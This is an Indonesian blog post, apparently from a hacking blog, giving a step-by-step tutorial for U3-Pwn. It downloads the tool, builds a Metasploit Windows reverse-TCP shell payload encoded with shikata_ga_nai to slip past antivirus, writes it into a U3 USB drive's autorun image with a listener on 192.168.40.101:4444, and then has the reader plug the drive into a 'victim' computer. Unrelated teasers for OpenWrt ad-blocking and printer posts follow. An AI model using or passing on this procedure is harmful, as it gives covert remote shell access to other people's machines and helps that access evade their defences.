Skip to main content

Cara menggunakan U3 Pwn


Cara menggunakan U3 Pwn
Ditahun-tahun yang lalu kita mungkin masih mengingat UFD yang memiliki U3 chipset dapat digunakan sebagai usb tools hacking. beberapa diantaranya dikenal sebagai USB switchblade dan USB Hacksaw dimana program tertentu diinjeksikan kedalam chipset u3 untuk "mengemulasikan cdrom drive" yang akan mengeksekusi program yg diinjeksikan tersebut (autoplay). output yg dihasilkan oleh program ini berupa informasi2 hash password LSA, IP information, browser history hingga cookie auto fill information.

U3 Pawn masih menggunakan metode yang sama dengan usb switchblade, akan tetapi code program di injeksikan bukan ditujukan untuk memanen informasi2 dari komputer korban melainkan membuat/menjalankan backdoor pada port tertentu. Uniknya proses yang dijalankan berada didumping memory (tidak membuat file baru di komputer korban) sehingga saat dilepas dari komputer korban background prosesnya masih tetapa berjalan selama masih dalam sesi yang sama (tidak di restart)..

Requirement :

UFD yang mendukung U3, ex: UFD bermerk Sandisk, Kingston (tipe lama)...
Linux yg memiliki Metasploit (ex: Backtrack)
U3 Tool (ada di repo Backtrack)
U3 Pwn.tar.gz (http://dl.packetstormsecurity.net/UN.../U3-Pwn.tar.gz)


The step:
- Masukkan UFD U3 anda ke usb port.
- Install U3 tool kedalam Linux anda
apt-get install u3-tool

- Download U3 Pwn.tar.gz
wget http://dl.packetstormsecurity.net/UN.../U3-Pwn.tar.gz

- Ekstrak U3-Pwn.tar.gz
wget tar xzvf U3-Pwn.tar.gz

- Jalankan U3-pwn.tar.gz
cd /root/U3-Pwn
python U3-Pwn.py

- Pilih 1 untuk men-Generate & Replace Iso Image
Enter the number: 1

- Pilih 1 untuk memilih payload exploit (Windows Shell Reverse_TCP) yang akan dijalankan
Enter number: 1


- Pilih 2 untuk memilih shikata_ga_nai sebagai encoder untuk melewati firewall dan antivirus.
Enter the number: 1

- Masukkan no ip host anda serta port backdoorny, ip lan atau bisa juga ip publik yang anda dapatkan dari ISP 
ex: dalam kasus ini saya menggunakan backtrack sebagai host yang mendapatkan ip 192.168.40.101 sedangkan korban memiliki IP 192.168.40.1
Enter Ip Address for reverse listener: 192.168.40.101

Enter the port of the Listener: 4444

- Masukkan letak UFD di linux ex:sdb1
Enter the device to change iso image on (example /dev/sde1): /dev/sdb1


~ .__ °.__ 0 o ^ .__ °__ `´
°____) __ __| | | °| ______°____ 0 ____ __ _________|__|/ |_ ___.__.
/ \| | °\ |°| | °/ ___// __ \_/ ___\| | °\_ __ \ o\ __< | |
| o°| \ | / |_| |__\___ \ ___/\ °\___| o| /| | \/ || |° \___ O|
|___| /____/|____/____/____ °>\___ >\___ >____/ |__|° |__||__| / ____|
`´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/ ``´```´```´´´´`´``0_o\/´´`´´

************************************************** **********************
U3-Pwn Metasploit Payload Injection Tool For SanDisk Devices
************************************************** **********************


Generating Shellcode Please Wait...
|************************************************* *| 100%
OK


- Pilih yes untuk menjalan exploit handler
Do you want to start a listener to receive the payload yes or no: yes

- Unplug UFD
- Masukkan UFD ke komputer korban
- Tunggu beberapa saat dan komputer korban akan membuka backdoornya untuk komputer host....selanjutnya terserah anda...




Terima kasih sudah membaca tutorial menggunakan U3 Pwn
related link:
http://packetstormsecurity.org/files...tion-Tool.html

Comments

Popular posts from this blog

Block ads domain di router openwrt

Kesal sekali tentunya ketika kita lagi berselancar di Dunia maya banyak banget iklan yang berbayang!!! apalagi iklannya bejibun sampai-sampai halaman browser sampai penuh dan kita handak mengkliknya satu persatu lama sekali kan!!!??? sedikit juga penjelasan mengenai ads ini, ads ini sangatlaah mengurusa bandwith kita dan yang paling parahnya penyebaran malware melalui ads ini sangatlah membahayakan komputer kita. okeh sekian penjelasan singkatnya CWIMM tutorial ini saya gunakan di router yang sudah saya ganti firmware ke OPENWRT 1. tambahkan file yang berada di     root@unsheel:~#/vi etc/dnsmasq.conf tambahkan ini address=/207.net/127.0.0.1 address=/247realmedia.com/127.0.0.1 address=/247realmedia.com/127.0.0.1 address=/2mdn.net/127.0.0.1 address=/2o7.net/127.0.0.1 address=/33across.com/127.0.0.1 address=/51yes.com/127.0.0.1 address=/abmr.net/127.0.0.1 address=/adbrite.com/127.0.0.1 address=/adbureau.net/127.0.0.1 address=/adchemy.com/127.0.0.1 address=/addthis.com

cara install printer epson stylus tx121x di backtrack

hello sahabat .. kali ini saya akan share bagaimana cara install printer epson stylus tx121x di backtrack langsung saja agan download drivernya di sini -----  > http://adf.ly/TCK26 -----  >  http://adf.ly/TCKbK -----  >  http://adf.ly/TCKjA setelah itu semua di download, lalu sahabat tinggal install saja satu persatu file .deb tersebut .... mudah koq hehehee .. oea jangan lupa juga install pendukung yang lainnya untuk mengconfiguration di system --> administation --> synaptic packet manager masukkan   " system-config-printer "   di quick search lalu centang system-config-printer-gnome system-config-printer-common system-config- printer-udev http://unsheal.blogspot.com/2013/07/cara-install-printer-epson-stylus.html okeeey deh selesai install printer driver epson tx121x di backtrack sudah bisa deeeh di gunakan printernya, beserta scanningnya sekian dari saya ...

Cara Upgrade Tp-link Mr3040 v.2 ke OpenWrt

Upgrade Tp-Link MR 3040 V.2 Sahabat kali ini saya akan share bagaimana cara untuk Upgrade firmware ke OpenWrt Bahan yang disiapkan, download firmware OpenWrt untuk tp-link mr 3040 v.2 kalo yang v.1 tidak bisa neeh disini linknya download Pertama kita login sebagai admin di router kita biasanya seeh http://192.168.0.1 bila Ip nya belum di ganti, dan bila Ip nya sudah di ganti di sesuaikan saja. setelah login klik System tools =>> Firmware Upgrade =>> pilih browse lalu kita cari di mana file yang tadi kita download setelah itu tekan tombol upgrade tunggu sampai beberapa menit oea PERINGATAN PENTING dalam proses ini jangan sampai mati routernya diamkan saja dan lihat prosesnya nanti akan seperti ini setelah proses semua itu selesai. untuk menuju ke admin ketikkan di browser 192.168.1.1 dan nanti akan tampak halaman seperti ini untuk passwordnya 5up neeh screenshoot kalo sudah login Sekian cara upgrade tp-link mr3040 v.2 ke firmware OpenWrt